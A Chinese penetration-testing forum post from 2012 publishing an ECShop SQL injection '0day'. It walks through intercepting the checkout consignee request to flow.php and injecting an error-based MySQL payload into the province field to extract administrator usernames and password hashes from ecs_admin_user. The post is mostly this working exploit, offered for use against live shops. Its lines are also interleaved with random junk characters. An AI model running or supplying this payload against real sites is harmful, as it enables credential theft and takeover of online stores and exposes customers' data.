找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 ECShop全版本SQL注入0day
返回列表 发新帖
查看: 3035|回复: 0
打印 上一主题 下一主题

ECShop全版本SQL注入0day

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-31 09:19:27 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
感谢欠杀的黑盒
6 l# |6 @) |- N) Q( {& L3 G' e# B; W* \  q1 A# P/ C3 v$ l

) e. |+ V& ]: @8 F% m  I& G把任意商品加入购物车在填写配送地址那一页,有地区选择
( `9 [) M# f# ]3 I$ j7 h/ y
' x; Q4 g4 v1 I( qflow.php?step=consignee&direct_shopping=13 t0 T5 E. ^  \7 U; i
比如省选择安徽
6 n- ~; [5 ?# B# ^' O) @
8 K3 ~) P6 P5 y+ D4 ?其中POST数据如下
" Z) s; k- T* p( \
2 O: K) N4 ~7 C" J! T2 H. ]0 mcountry=1&province=3&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&mobile=11111111&sign_building=111111111&best_time=111111111&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&step=consignee&act=checkout&address_id=province=3
' [% n4 Z8 I( p改成: w% d5 \' F$ s  }( Q; W5 m
5 G, w! _% Y  \* P* H  q7 e; [4 L3 H
province=3') and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #2 h' G6 U4 f% u9 ]! [3 u/ R5 k; f+ T( c5 w
ps:详细的方法,用火狐tamper data插件……..即可改post内容…..* z9 H3 i2 z; {3 r% \: z

' h1 a; D1 i3 g6 r/ z9 y! C先注册账户,随便选个商品进购物车,然后填地址,电话什么的,填好开始抓包,改包
/ z3 ~: V( O- B. a7 t) f : s1 e: E. D( P  u( b% E& l
就会回显错误页面了。。。。
6 g& e1 R6 d. ]# F& v: x 3 }3 Y% i, F- E
我自己没用这个日站过,就测试了一个最新版和老版本,均ok,所以写全版本,理论上应该是的, E7 B" |  q! d
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表